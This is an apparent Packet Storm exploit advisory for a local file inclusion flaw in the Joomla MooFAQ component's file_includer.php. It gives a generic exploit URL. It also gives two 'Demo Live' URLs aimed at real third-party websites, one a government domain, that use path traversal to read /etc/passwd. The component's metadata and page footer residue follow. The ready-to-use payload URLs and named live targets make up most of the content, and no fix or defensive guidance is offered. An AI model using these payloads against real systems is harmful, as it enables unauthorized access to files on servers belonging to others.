The Joomla MooFAQ component suffers from a local file inclusion vulnerability.
a00531aa3632400ba15cb8b6162f15a40667d794f862482947d752107b0d805c----------------------------------------------------------------------
Joomla Component MooFAQ Local File Inclusion Vulnerability
----------------------------------------------------------------------
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : LFI
###################################################
________________________________________________________
Example:
http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]
Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd
++++++++++++++++++++++++++++++++
[!] Produced in South America
--------------------------------
<productName>FAQ Component using mooTools</productName>
<creationDate>20 July 2007</creationDate>
<version>1.0</version>
<joomlaVersion>1.0.13</joomlaVersion>
<author>Douglas Machado</author>
<authorName>Douglas Machado</authorName>
<authorEmail>falecom@focalizaisso.com.br</authorEmail>
<authorUrl>opensource.focalizaisso.com.br</authorUrl>
<productPicture>config.png</productPicture>
<productUrl>http://opensource.focalizaisso.com.br/</productUrl>
<setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed